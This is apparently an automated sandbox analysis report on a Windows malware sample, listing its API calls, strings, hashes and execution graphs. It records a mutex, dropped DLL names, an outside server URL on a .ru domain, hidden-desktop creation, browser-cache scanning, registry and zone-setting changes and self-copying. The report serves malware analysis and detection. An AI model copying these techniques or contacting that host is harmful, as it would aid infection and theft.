                            • Instruction Fuzzy Hash: 2A41EB71E4030DAFEB108FD4DC85BEEB7B9FB04319F50403AEA00BA191D7B9595A8B59
                            APIs
                            • sprintf.CRTDLL(?,SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%u,00000000), ref: 004050CD
                            Strings
                            • yes, xrefs: 0040510E
                            • 1601, xrefs: 004050D4
                            • SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%u, xrefs: 004050C1
                            • Software\Microsoft\Windows\CurrentVersion\Internet Settings, xrefs: 004050FF
                            • BrowseNewProcess, xrefs: 00405113
                            • .DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BrowseNewProcess, xrefs: 00405118
                            • GlobalUserOffline, xrefs: 004050FA
                            Memory Dump Source
                            • Source File: 00000005.00000002.1984377301.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1984355938.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                            • Associated: 00000005.00000002.1984697052.000000000042A000.00000004.00000001.01000000.00000008.sdmp
                            • Associated: 00000005.00000002.1984738223.000000000042E000.00000020.00000001.01000000.00000008.sdmp
                            • Associated: 00000005.00000002.1984773155.000000000042F000.00000002.00000001.01000000.00000008.sdmp
                            • Associated: 00000005.00000002.1984812704.0000000000436000.00000020.00000001.01000000.00000008.sdmp
                            • Associated: 00000005.00000002.1984845188.0000000000438000.00000002.00000001.01000000.00000008.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_Olijjb32.jbxd
                            Yara matches
                            Similarity
                            • API ID: sprintf
                            • String ID: .DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BrowseNewProcess$1601$BrowseNewProcess$GlobalUserOffline$SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%u$Software\Microsoft\Windows\CurrentVersion\Internet Settings$yes
                            • API String ID: 590974362-546450379
                            • Opcode ID: ad57bd7a5e5ee7174c091d0a3ea72984deb32bb5560bbbda773b8a609c7be674
                            • Instruction ID: cd0aaffbc0bd71aa605591c0976343fec0ffbebd6d6d4fedce8ce2f9217411d7
                            • Opcode Fuzzy Hash: ad57bd7a5e5ee7174c091d0a3ea72984deb32bb5560bbbda773b8a609c7be674
                            • Instruction Fuzzy Hash: 24F07DF2F883587EE710A1699C47F8D765907A1704FA400A7BA44B10C2D0FE56C6826D
                            APIs
                            Memory Dump Source
                            • Source File: 00000005.00000002.1984377301.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1984355938.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                            • Associated: 00000005.00000002.1984697052.000000000042A000.00000004.00000001.01000000.00000008.sdmp
                            • Associated: 00000005.00000002.1984738223.000000000042E000.00000020.00000001.01000000.00000008.sdmp
                            • Associated: 00000005.00000002.1984773155.000000000042F000.00000002.00000001.01000000.00000008.sdmp
                            • Associated: 00000005.00000002.1984812704.0000000000436000.00000020.00000001.01000000.00000008.sdmp
                            • Associated: 00000005.00000002.1984845188.0000000000438000.00000002.00000001.01000000.00000008.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_Olijjb32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Focus$CallProcWindow
                            • String ID:
                            • API String ID: 2401821148-0
                            • Opcode ID: 92e1ce8f7ee7a46a278bda77c005b4e0a5389e500612bd3ca87d360d572643d3
                            • Instruction ID: 67d25c2989ca0d32993d4aa71a0b11dc39683739a3ff9c0c7d6bcfde353c753a
                            • Opcode Fuzzy Hash: 92e1ce8f7ee7a46a278bda77c005b4e0a5389e500612bd3ca87d360d572643d3
                            • Instruction Fuzzy Hash: 6F318233E082149BDF21FB29ED848DA7726A751324715C43AE550B32B1DB787C91CB6E
                            APIs
                            • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,?,00000080,00000000), ref: 004036D7
                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,C0000000,00000000,00000000,?,00000080,00000000), ref: 004036F4
                            • WriteFile.KERNEL32(00000000,?,?,?,00000000,00000000,00000000,00000000,00000002,?,C0000000,00000000,00000000,?,00000080,00000000), ref: 00403715
                            • WriteFile.KERNEL32(00000000,0042CC6C,00000002,?,00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,00000002,?,C0000000), ref: 00403728
                            • CloseHandle.KERNEL32(00000000,00000000,0042CC6C,00000002,?,00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,00000002,?), ref: 00403734
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1984377301.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1984355938.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                            • Associated: 00000005.00000002.1984697052.000000000042A000.00000004.00000001.01000000.00000008.sdmp
                            • Associated: 00000005.00000002.1984738223.000000000042E000.00000020.00000001.01000000.00000008.sdmp
                            • Associated: 00000005.00000002.1984773155.000000000042F000.00000002.00000001.01000000.00000008.sdmp
                            • Associated: 00000005.00000002.1984812704.0000000000436000.00000020.00000001.01000000.00000008.sdmp
                            • Associated: 00000005.00000002.1984845188.0000000000438000.00000002.00000001.01000000.00000008.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_Olijjb32.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$Write$CloseCreateHandlePointer
                            • String ID: Y&-v
                            • API String ID: 2529654636-852306816
                            APIs
                            • FindFirstUrlCacheEntryA.WININET(*.*,?,00001F40), ref: 00405654
                            • _stricmp.CRTDLL(?,?), ref: 00405679
                            • FindNextUrlCacheEntryA.WININET(00000000,?,00001F40), ref: 004056C0
                            • _stricmp.CRTDLL(?,?), ref: 004056D6
                            Strings
                            Yara matches
                            Similarity
                            • API ID: CacheEntryFind_stricmp$FirstNext
                            • String ID: *.*
                            • API String ID: 747601842-438819550
                            APIs
                            • GetCurrentThreadId.KERNEL32 ref: 00404341
                            • GetThreadDesktop.USER32(00000000), ref: 00404347
                            • CreateDesktopA.USER32(blind_user,00000000,00000000,00000000,000000C7,00000000), ref: 00404376
                            • SetThreadDesktop.USER32 ref: 00404394
                            Strings
                            Yara matches
                            Similarity
                            • API ID: DesktopThread$CreateCurrent
                            • String ID: blind_user
                            • API String ID: 2384851093-487808672
                            APIs
                            Strings
                            Yara matches
                            Similarity
                            • API ID: printf
                            • String ID: %02X $HEX:
                            • API String ID: 3524737521-2568639716
                            APIs
                            • memset.CRTDLL(?,00000090,00000008,56CC39D8,-0042AA50,297D09F2,00000000), ref: 00403C8B
                            • memcpy.CRTDLL(?,-0042AA50,00000000,?,00000090,00000008,56CC39D8,-0042AA50,297D09F2,00000000), ref: 00403CAE
                            • memcpy.CRTDLL(-0042AA50,?,00000006,?,-0042AA50,00000000,?,00000090,00000008,56CC39D8,-0042AA50,297D09F2,00000000), ref: 00403CBE
                            Strings
                            Yara matches
                            Similarity
                            • API ID: memcpy$memset
                            • String ID: MC
                            • API String ID: 438689982-3957011357
                            APIs
                            • CoInitialize.OLE32(00000000), ref: 004017CC
                            • CLSIDFromString.OLE32({9BA05972-F6A8-11CF-A442-00A0C90A8F39},?), ref: 004017DA
                            • CoCreateInstance.OLE32(?,00000000,?,0042CD50,?,{9BA05972-F6A8-11CF-A442-00A0C90A8F39},?), ref: 00401803
                            Strings
                            • {9BA05972-F6A8-11CF-A442-00A0C90A8F39}, xrefs: 004017D5
                            Yara matches
                            Similarity
                            • API ID: CreateFromInitializeInstanceString
                            • String ID: {9BA05972-F6A8-11CF-A442-00A0C90A8F39}
                            • API String ID: 1245325315-1222218007
                            APIs
                            Yara matches
                            Similarity
                            • API ID: signal$raise
                            • String ID:
                            • API String ID: 372037113-0
                            APIs
                            • lstrlenA.KERNEL32(?), ref: 00404492
                            • LocalAlloc.KERNEL32(00000040,-00000008,?), ref: 004044A4
                            • sprintf.CRTDLL(?,%s%c%c,?,4EC4EBEE,?,00000040,-00000008,?), ref: 00404515
                            Strings
                            Yara matches
                            Similarity
                            • API ID: AllocLocallstrlensprintf
                            • String ID: %s%c%c
                            • API String ID: 2176257816-3118753097
                            APIs
                            • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,00020006,00000000,?,?,4FB14922), ref: 00404255
                            • RegSetValueExA.ADVAPI32(?,4FB14922,00000000,00000000,?,?,?,?,00000000,00000000,00000000,00020006,00000000,?,?,4FB14922), ref: 00404273
                            • RegCloseKey.ADVAPI32(?,?,4FB14922,00000000,00000000,?,?,?,?,00000000,00000000,00000000,00020006,00000000,?,?), ref: 0040427F
                            Yara matches
                            Similarity
                            • API ID: CloseCreateValue
                            • String ID:
                            • API String ID: 1818849710-0
                            APIs
                            • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 004042D3
                            • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,?,?,00000000,00020019,?), ref: 004042EF
                            • RegCloseKey.ADVAPI32(?,?,?,00000000,00000000,?,?,?,?,00000000,00020019,?), ref: 004042FB
                            Yara matches
                            Similarity
                            • API ID: CloseOpenQueryValue
                            • String ID:
                            • API String ID: 3677997916-0
                            APIs
                            • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,?,00000080,00000000), ref: 00403769
                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,C0000000,00000000,00000000,?,00000080,00000000), ref: 00403780
                            • WriteFile.KERNEL32(00000000,?,?,?,00000000,00000000,00000000,00000000,00000002,?,C0000000,00000000,00000000,?,00000080,00000000), ref: 00403798
                            • CloseHandle.KERNEL32(00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,00000002,?,C0000000,00000000,00000000,?,00000080), ref: 0040379E
                            Yara matches
                            Similarity
                            • API ID: File$CloseCreateHandlePointerWrite
                            • String ID:
                            • API String ID: 3604237281-0
                            APIs
                            • GetWindowTextA.USER32(?,?,?), ref: 004018E2
                            • _sleep.CRTDLL(00000000), ref: 00401985
                            Strings
                            • Microsoft Internet Explorer, xrefs: 004018E9
                            Yara matches
                            Similarity
                            • API ID: TextWindow_sleep
                            • String ID: Microsoft Internet Explorer
                            • API String ID: 2600969163-3125735337
                            APIs
                              • Part of subcall function 00406753: CreateFileA.KERNEL32(?,80000000,?,00000000,?,00000080,00000000), ref: 0040677F
                              • Part of subcall function 00406753: GetFileSize.KERNEL32(00000000,00000000,?,80000000,?,00000000,?,00000080,00000000), ref: 0040679E
                              • Part of subcall function 00406753: CloseHandle.KERNEL32(00000000,00000000,00000000,?,80000000,?,00000000,?,00000080,00000000), ref: 004067A6
                            • _sleep.CRTDLL(000927C0,00418E30,http://tat-neftbank.ru/kkq.php,ofs_kk), ref: 00406854
                            Strings
                            Yara matches
                            Similarity
                            • API ID: File$CloseCreateHandleSize_sleep
                            • String ID: http://tat-neftbank.ru/kkq.php$ofs_kk
                            • API String ID: 4235044784-1201080362

                            Execution Graph

                            Execution Coverage: 5.4%
                            Dynamic/Decrypted Code Coverage: 0%
                            Signature Coverage: 0%
                            Total number of Nodes: 542
                            Total number of Limit Nodes: 2
2957->2964 2965 402f6f IsBadReadPtr 2957->2965 2966 403059 CloseHandle 2957->2966 2958->2957 2960->2957 2961->2957 2962->2957 2963 4031b1 IsBadWritePtr 2962->2963 2963->2957 2964->2957 2965->2957 2966->2957 2967 407892 2968 40789e 2967->2968 2969 407910 2968->2969 2970 4078fe CallWindowProcA 2968->2970 2970->2969 3018 405133 10 API calls 3019 40429c 4 API calls 3018->3019 3020 405264 3019->3020 3021 405278 3020->3021 3022 40526b LocalFree 3020->3022 3024 40509b 6 API calls 3021->3024 3023 4054d0 3022->3023 3025 40527d ExpandEnvironmentStringsA 3024->3025 3044 404532 3025->3044 3028 4052d3 LocalFree 3028->3023 3029 4052ec strcat strcat 3030 40431f 4 API calls 3029->3030 3031 405315 memset 3030->3031 3032 405360 3031->3032 3033 40537c CreateProcessA 3031->3033 3032->3033 3034 4053ac CloseHandle sprintf 3033->3034 3043 405469 3033->3043 3036 405413 3034->3036 3035 405492 DeleteFileA LocalFree TerminateProcess CloseHandle 3035->3023 3037 4053e5 FindWindowA 3036->3037 3038 40541d 3036->3038 3037->3038 3039 405402 Sleep 3037->3039 3040 405421 Sleep 3038->3040 3038->3043 3039->3036 3041 405434 Sleep 3040->3041 3042 40543e GetWindowTextA 3040->3042 3041->3042 3042->3043 3043->3035 3045 40453f 3044->3045 3046 403619 5 API calls 3045->3046 3047 404570 3046->3047 3048 404579 3047->3048 3049 404596 lstrlenA LocalAlloc GetTempPathA 3047->3049 3050 404589 LocalFree 3047->3050 3048->3028 3048->3029 3051 404604 3049->3051 3050->3048 3051->3051 3052 4015ea rand 3051->3052 3053 40461d strcat sprintf rand 3052->3053 3054 404655 strcat 3053->3054 3055 404668 rand 3053->3055 3054->3055 3056 40467a rand sprintf 3055->3056 3057 40469d rand 3055->3057 3056->3057 3058 4046bb strcat 3057->3058 3059 4046ce strcat rand 3057->3059 3058->3059 3060 4046f3 strcat 3059->3060 3061 404706 rand 3059->3061 3060->3061 3062 404741 sprintf rand 3061->3062 3063 40471e rand sprintf 3061->3063 3064 404770 strcat 3062->3064 3065 404783 strcat rand 3062->3065 3063->3062 3064->3065 3066 4047a8 strcat 
3065->3066 3067 4047bb strcat rand 3065->3067 3066->3067 3068 4047e6 rand sprintf 3067->3068 3069 404809 rand sprintf sprintf rand 3067->3069 3068->3069 3070 404859 rand sprintf 3069->3070 3071 40487c rand 3069->3071 3070->3071 3072 404894 strcat 3071->3072 3073 4048a7 rand 3071->3073 3072->3073 3074 4048b9 strcat 3073->3074 3075 4048cc rand 3073->3075 3074->3075 3076 4048f1 sprintf rand 3075->3076 3077 4048de strcat 3075->3077 3078 404926 strcat 3076->3078 3079 404939 rand 3076->3079 3077->3076 3078->3079 3080 40494b strcat 3079->3080 3081 40495e rand 3079->3081 3080->3081 3082 404976 rand sprintf 3081->3082 3083 404999 3081->3083 3082->3083 3087 4049a3 3083->3087 3110 404b12 3083->3110 3084 404b07 3086 404c87 strcat rand 3084->3086 3085 4043bf 2 API calls 3085->3110 3088 404cac strcat 3086->3088 3089 404cbf rand 3086->3089 3087->3084 3090 404a4b sprintf rand 3087->3090 3091 4049d9 sprintf 3087->3091 3088->3089 3092 404cd1 strcat 3089->3092 3093 404ce4 rand 3089->3093 3094 404a82 strcat 3090->3094 3095 404a95 rand 3090->3095 3091->3087 3092->3093 3097 404cf6 strcat 3093->3097 3098 404d09 strcat rand 3093->3098 3094->3095 3099 404aa7 strcat 3095->3099 3100 404aba rand 3095->3100 3096 404b47 sprintf 3096->3110 3097->3098 3101 404d34 rand sprintf 3098->3101 3102 404d57 rand 3098->3102 3099->3100 3100->3087 3103 404acc strcat 3100->3103 3101->3102 3104 404d69 strcat 3102->3104 3105 404d7c rand 3102->3105 3103->3087 3104->3105 3106 404da1 rand 3105->3106 3107 404d8e strcat 3105->3107 3108 404db9 strcat 3106->3108 3109 404dcc rand 3106->3109 3107->3106 3108->3109 3111 404e01 strcat rand 3109->3111 3112 404dde rand sprintf 3109->3112 3110->3085 3110->3086 3110->3096 3137 40447a lstrlenA LocalAlloc 3110->3137 3114 404e2c strcat 3111->3114 3115 404e3f strcat rand 3111->3115 3112->3111 3114->3115 3117 404e64 strcat 3115->3117 3118 404e77 strcat rand 3115->3118 3117->3118 3121 404ea2 strcat 3118->3121 3122 404eb5 sprintf rand 3118->3122 3119 404c02 rand 3123 404c14 strcat 
3119->3123 3124 404c27 rand 3119->3124 3120 404bef strcat 3120->3119 3121->3122 3127 404ee3 strcat 3122->3127 3128 404ef6 strcat rand 3122->3128 3123->3124 3125 404c39 strcat 3124->3125 3126 404c4c LocalFree 3124->3126 3125->3126 3126->3110 3127->3128 3129 404f27 strcat 3128->3129 3130 404f3a rand sprintf rand 3128->3130 3129->3130 3131 404f77 strcat 3130->3131 3132 404f8a strcat rand 3130->3132 3131->3132 3133 404fb5 strcat 3132->3133 3134 404fc8 rand 3132->3134 3133->3134 3135 404fda rand sprintf 3134->3135 3136 404ffd 7 API calls 3134->3136 3135->3136 3136->3048 3138 4044b6 3137->3138 3139 4044d9 sprintf 3138->3139 3140 40452a sprintf rand 3138->3140 3139->3138 3140->3119 3140->3120 3141 401b33 3144 401aa4 3141->3144 3142 401b13 3143 401ae6 sprintf 3146 40129c 3143->3146 3144->3142 3144->3143 3147 4012a9 CreateFileA 3146->3147 3148 4079e4 3146->3148 3149 4012db ReadFile CloseHandle 3147->3149 3150 4012d7 3147->3150 3148->3147 3149->3150 3150->3142 3151 4036b3 CreateFileA 3152 4036e3 3151->3152 3153 4036e7 SetFilePointer 3151->3153 3154 403701 3153->3154 3154->3154 3155 403708 WriteFile WriteFile CloseHandle 3154->3155 3155->3152 2761 406ff6 2762 4071a4 2761->2762 2763 40701f 2761->2763 2764 40717e 2762->2764 2765 4071be DestroyWindow 2762->2765 2766 407021 2763->2766 2767 40702f 2763->2767 2765->2764 2768 407184 2766->2768 2769 40702a 2766->2769 2770 407289 GetWindowTextA 2767->2770 2771 40703a 2767->2771 2768->2764 2774 407198 PostQuitMessage 2768->2774 2775 4077cc DefWindowProcA 2769->2775 2772 4072c9 GetWindowTextA 2770->2772 2773 4072a9 MessageBoxA SetFocus 2770->2773 2776 407041 2771->2776 2777 40705c 2771->2777 2778 407322 2772->2778 2779 407302 MessageBoxA SetFocus 2772->2779 2773->2764 2774->2764 2775->2764 2776->2769 2776->2775 2781 4071cb 2776->2781 2780 407149 2777->2780 2817 405ffa 2777->2817 2785 407337 MessageBoxA SetFocus 2778->2785 2794 407357 2778->2794 2779->2764 2780->2764 2824 406075 2780->2824 2781->2764 2787 407224 SetTextColor 2781->2787 
2789 407233 SetTextColor 2781->2789 2785->2764 2786 405ffa 3 API calls 2788 40709b GetWindowRect 2786->2788 2790 40723d SetBkColor CreateBrushIndirect 2787->2790 2788->2780 2791 4070be GetWindowRect 2788->2791 2789->2790 2790->2764 2791->2780 2793 4070d4 2791->2793 2792 4073a7 sprintf GetWindowTextA 2796 40740f sprintf GetWindowTextA 2792->2796 2797 4073ef MessageBoxA SetFocus 2792->2797 2793->2780 2800 407112 MoveWindow 2793->2800 2794->2792 2795 407376 MessageBoxA SetFocus 2794->2795 2795->2764 2798 407477 sprintf GetWindowTextA 2796->2798 2799 407457 MessageBoxA SetFocus 2796->2799 2797->2764 2801 4074d9 2798->2801 2802 4074b9 MessageBoxA SetFocus 2798->2802 2799->2764 2800->2780 2803 4074ee MessageBoxA SetFocus 2801->2803 2805 40750e 2801->2805 2802->2764 2803->2764 2804 40755e sprintf GetWindowTextA 2807 4075c6 2804->2807 2808 4075a6 MessageBoxA SetFocus 2804->2808 2805->2804 2806 40752d MessageBoxA SetFocus 2805->2806 2806->2764 2809 407627 sprintf CreateFileA SetFilePointer 2807->2809 2810 4075e5 MessageBoxA SetFocus 2807->2810 2808->2764 2811 40768e 2809->2811 2810->2764 2811->2811 2812 407695 WriteFile WriteFile 2811->2812 2813 4076db 2812->2813 2813->2813 2814 4076e2 6 API calls 2813->2814 2815 40776e 2814->2815 2815->2815 2816 407775 WriteFile WriteFile CloseHandle ShowWindow 2815->2816 2816->2764 2818 4079e4 2817->2818 2819 406007 GetWindow 2818->2819 2822 406020 2819->2822 2820 406028 GetClassNameA 2820->2822 2821 406024 2821->2786 2822->2820 2822->2821 2823 40605f GetWindow 2822->2823 2823->2822 2825 405ffa 3 API calls 2824->2825 2826 406096 2825->2826 2827 405ffa 3 API calls 2826->2827 2828 4060a3 10 API calls 2827->2828 2829 406224 SendMessageA 2828->2829 2830 40623a SendMessageA 2828->2830 2831 40624e CreateWindowExA CreateWindowExA 2829->2831 2830->2831 2832 406333 2831->2832 2833 4062cb sprintf SendMessageA sprintf SendMessageA 2832->2833 2834 40633c 34 API calls 2832->2834 2833->2832 2834->2764 2971 401219 2972 40121f __GetMainArgs 2971->2972 
2973 407980 173 API calls 2972->2973 2974 401284 exit 2973->2974 2975 40109a 2983 40109b 2975->2983 2976 40117f 2977 40118e signal 2976->2977 2978 4011a8 signal 2977->2978 2979 4011c9 2977->2979 2978->2979 2980 40117b 2978->2980 2979->2980 2981 4011ce signal raise 2979->2981 2981->2980 2983->2976 2983->2977 2983->2980 2984 40107a RtlUnwind 2983->2984 2984->2983 2835 40237b 2836 402333 _sleep 2835->2836 2837 402355 2835->2837 2838 401b9f 23 API calls 2836->2838 2839 40234c 2838->2839 2839->2836 2839->2837 2985 40109b 2986 40117f 2985->2986 2993 4010c3 2985->2993 2987 40118e signal 2986->2987 2988 4011a8 signal 2987->2988 2989 4011c9 2987->2989 2988->2989 2990 40117b 2988->2990 2989->2990 2991 4011ce signal raise 2989->2991 2991->2990 2993->2987 2993->2990 2994 40107a RtlUnwind 2993->2994 2994->2993 2995 40129b 2996 4079e4 2995->2996 2997 4012a9 CreateFileA 2996->2997 2998 4012db ReadFile CloseHandle 2997->2998 2999 4012d7 2997->2999 2998->2999 2711 40365e 2712 403664 GetFileSize LocalAlloc 2711->2712 2713 403684 ReadFile CloseHandle 2712->2713 2715 4036ae 2713->2715 2530 40121f __GetMainArgs 2533 407980 GetCommandLineA 2530->2533 2534 407991 strchr 2533->2534 2538 4079a6 2533->2538 2535 4079cf GetModuleHandleA 2534->2535 2534->2538 2539 406c29 OpenMutexA 2535->2539 2538->2535 2540 406c6d GetVersionExA GetSystemDirectoryA GetTickCount srand GetModuleFileNameA 2539->2540 2541 406c5f CloseHandle exit 2539->2541 2542 406cd6 2540->2542 2541->2540 2543 406ce4 rand 2542->2543 2544 406e07 9 API calls 2542->2544 2546 406d5f 2543->2546 2586 402e06 2544->2586 2548 406d69 rand 2546->2548 2549 406d2f rand 2546->2549 2550 406d8a sprintf CopyFileA 2548->2550 2551 406d7c 2548->2551 2549->2546 2563 403ce9 rand 2550->2563 2551->2550 2552 406f65 2602 4023a7 CreateThread CloseHandle 2552->2602 2553 406f2d GetModuleHandleA GetProcAddress GetCurrentProcessId 2553->2552 2557 406f6a CreateThread CloseHandle CreateThread CloseHandle SetTimer 2559 406fdc GetMessageA 2557->2559 2654 4068b0 
2557->2654 2672 40682b 2557->2672 2560 406fc4 TranslateMessage DispatchMessageA 2559->2560 2561 401284 exit 2559->2561 2560->2559 2564 403d27 2563->2564 2565 403d2e 2563->2565 2574 403f68 rand 2564->2574 2603 403619 CreateFileA 2565->2603 2568 403d47 memcpy memset 2570 403da1 rand rand rand rand memcpy 2568->2570 2571 403e64 2570->2571 2609 403bbe 2571->2609 2575 404002 2574->2575 2576 403fd4 rand 2575->2576 2577 404009 rand 2575->2577 2576->2575 2578 40402a 6 API calls 2577->2578 2579 40401c 2577->2579 2614 404148 RegCreateKeyExA 2578->2614 2579->2578 2581 4040f5 2582 404148 3 API calls 2581->2582 2583 404125 2582->2583 2584 404148 3 API calls 2583->2584 2585 40413a WinExec ExitProcess 2584->2585 2587 402e13 2586->2587 2617 402822 6 API calls 2587->2617 2589 402e1b GetVersion 2590 402e2e 2589->2590 2591 402e79 LoadLibraryA GetProcAddress 2590->2591 2601 402ef6 2590->2601 2591->2590 2592 4033ce GetVersion 2592->2552 2592->2553 2593 4030e5 GetModuleHandleA 2593->2601 2595 40314c VirtualQuery 2596 4031b1 IsBadWritePtr 2595->2596 2595->2601 2596->2601 2597 402f98 GlobalMemoryStatus 2597->2601 2598 402f6f IsBadReadPtr 2598->2601 2600 403059 CloseHandle 2600->2601 2601->2592 2601->2593 2601->2595 2601->2597 2601->2598 2601->2600 2618 40289a 2601->2618 2622 402cd7 2601->2622 2602->2557 2631 4022ee 2602->2631 2604 403664 GetFileSize LocalAlloc 2603->2604 2605 40364e 2603->2605 2606 403684 ReadFile CloseHandle 2604->2606 2605->2604 2608 4036ae 2605->2608 2606->2608 2608->2564 2608->2568 2611 403bfd 2609->2611 2610 403ce4 CreateFileA WriteFile CloseHandle LocalFree 2610->2564 2611->2610 2612 403c20 rand 2611->2612 2613 403c80 memset memcpy memcpy 2611->2613 2612->2611 2613->2611 2615 404193 2614->2615 2615->2615 2616 40419a RegSetValueExA RegCloseKey 2615->2616 2616->2581 2617->2589 2619 4028c6 GetSecurityInfo SetEntriesInAclA SetSecurityInfo CloseHandle 2618->2619 2621 4029cd 2619->2621 2621->2601 2623 402ceb 2622->2623 2625 402d13 2623->2625 2626 402a72 2623->2626 
2625->2601 2629 402a89 2626->2629 2627 402cd2 2627->2625 2628 402b2a GetModuleHandleA GetProcAddress 2628->2629 2629->2627 2629->2628 2630 402cad GetCurrentProcessId 2629->2630 2630->2629 2632 402333 _sleep 2631->2632 2636 401b9f 2632->2636 2652 4079e4 2636->2652 2653 4079e5 2652->2653 2653->2653 2669 4068c7 2654->2669 2656 406c0c _sleep 2656->2669 2657 403619 5 API calls 2657->2669 2659 406c01 LocalFree 2659->2656 2660 406941 sscanf 2661 406972 rand 2660->2661 2660->2669 2661->2669 2662 406a84 atoi 2665 406aad sprintf 2662->2665 2662->2669 2663 4069a4 sprintf sprintf 2666 406a27 DeleteFileA sprintf WinExec 2663->2666 2664 4069db GetWindowsDirectoryA sprintf strcat 2664->2666 2665->2669 2666->2669 2667 406add lstrlenA 2667->2669 2668 406b20 sprintf lstrlenA lstrlenA LocalAlloc 2668->2669 2669->2656 2669->2657 2669->2659 2669->2660 2669->2662 2669->2663 2669->2664 2669->2667 2669->2668 2670 406b9b lstrlenA 2669->2670 2671 406bbe CreateThread CloseHandle 2669->2671 2676 405f5b lstrlenA lstrlenA LocalAlloc 2669->2676 2681 4043bf 2669->2681 2670->2669 2671->2669 2673 40683b 2672->2673 2689 406753 CreateFileA 2673->2689 2687 407a04 2676->2687 2678 405f9b lstrlenA 2688 407a04 2678->2688 2680 405fb4 DeleteUrlCacheEntry CreateThread WaitForSingleObject GetExitCodeThread CloseHandle 2680->2669 2682 4043dc 2681->2682 2683 40441a 2682->2683 2685 4043e2 memcpy 2682->2685 2684 404441 lstrlenA 2683->2684 2686 40442f 2683->2686 2684->2686 2685->2686 2686->2669 2687->2678 2688->2680 2690 40678f GetFileSize CloseHandle 2689->2690 2696 40681a _sleep 2689->2696 2697 4013cc RegOpenKeyExA 2690->2697 2696->2673 2698 4013fa 2697->2698 2699 4013fe RegQueryValueExA RegCloseKey 2697->2699 2698->2696 2700 4054d7 6 API calls 2698->2700 2699->2698 2701 405586 2700->2701 2702 4055ce CreateThread WaitForSingleObject GetExitCodeThread CloseHandle 2701->2702 2703 40560e 2702->2703 2703->2696 2704 401348 RegCreateKeyExA 2703->2704 2705 40138a RegSetValueExA RegCloseKey 2704->2705 2706 401386 
2704->2706 2705->2706 2706->2696

                            Control-flow Graph

                            APIs
                            • OpenMutexA.KERNEL32(001F0001,00000000,QueenKarton_12), ref: 00406C50
                            • CloseHandle.KERNEL32(00000000,00000000), ref: 00406C60
                            • exit.CRTDLL(00000001,00000000,00000000), ref: 00406C67
                            • GetVersionExA.KERNEL32(00418D50,00000000), ref: 00406C8A
                            • GetSystemDirectoryA.KERNEL32(00429080,000000FF), ref: 00406C99
                            • GetTickCount.KERNEL32 ref: 00406C9E
                            • srand.CRTDLL(00000000,00418D50,00000000), ref: 00406CA4
                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,00418D50,00000000), ref: 00406CBE
                            • rand.CRTDLL(00418D50,00000000), ref: 00406D03
                            • rand.CRTDLL(00418D50,00000000), ref: 00406D2F
                            • rand.CRTDLL(00418D50,00000000), ref: 00406D70
                            • sprintf.CRTDLL(?,%s\%s.exe,00429080,?,00418D50,00000000), ref: 00406DA8
                            • CopyFileA.KERNEL32(?,?,00000000), ref: 00406DBD
                            • WinExec.KERNEL32(?,00000000), ref: 00406DEC
                            • ExitProcess.KERNEL32(00000001,?,?,?,?,?,?,00418D50,00000000), ref: 00406E02
                            • sprintf.CRTDLL(00418E30,%s\%s,00429080,kkq32.dll,00418D50,00000000), ref: 00406E1B
                            • sprintf.CRTDLL(00428F60,%s\%s,00429080,kkq32.vxd,00418E30,%s\%s,00429080,kkq32.dll,00418D50,00000000), ref: 00406E3A
                            • sprintf.CRTDLL(00408020,%s\%s,00429080,dnkkq.dll,00428F60,%s\%s,00429080,kkq32.vxd,00418E30,%s\%s,00429080,kkq32.dll,00418D50,00000000), ref: 00406E53
                            • LoadCursorA.USER32(00000000,00007F00), ref: 00406E85
                            • LoadIconA.USER32(00000000,00007F03), ref: 00406E9A
                            • GetStockObject.GDI32(00000000), ref: 00406EA8
                            • RegisterClassA.USER32(00000003), ref: 00406EC9
                            • CreateWindowExA.USER32(00000000,QueenKarton,QueenKarton,00CA0000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00408020), ref: 00406EF3
                            • CreateMutexA.KERNEL32(00000000,00000000,QueenKarton_12,%s\%s,00429080,dnkkq.dll,00428F60,%s\%s,00429080,kkq32.vxd,00418E30,%s\%s,00429080,kkq32.dll,00418D50,00000000), ref: 00406F12
                              • Part of subcall function 00402E06: GetVersion.KERNEL32 ref: 00402E22
                              • Part of subcall function 00402E06: GlobalMemoryStatus.KERNEL32(?), ref: 00402F9F
                              • Part of subcall function 00402E06: CloseHandle.KERNEL32(?), ref: 00403065
                            • GetVersion.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00429080,kkq32.dll,00418D50,00000000), ref: 00406F21
                            • GetModuleHandleA.KERNEL32(kernel32.dll,?,?,?,?,?,?,?,?,?,?,?,00429080,kkq32.dll,00418D50,00000000), ref: 00406F32
                            • GetProcAddress.KERNEL32(00000000,RegisterServiceProcess), ref: 00406F3D
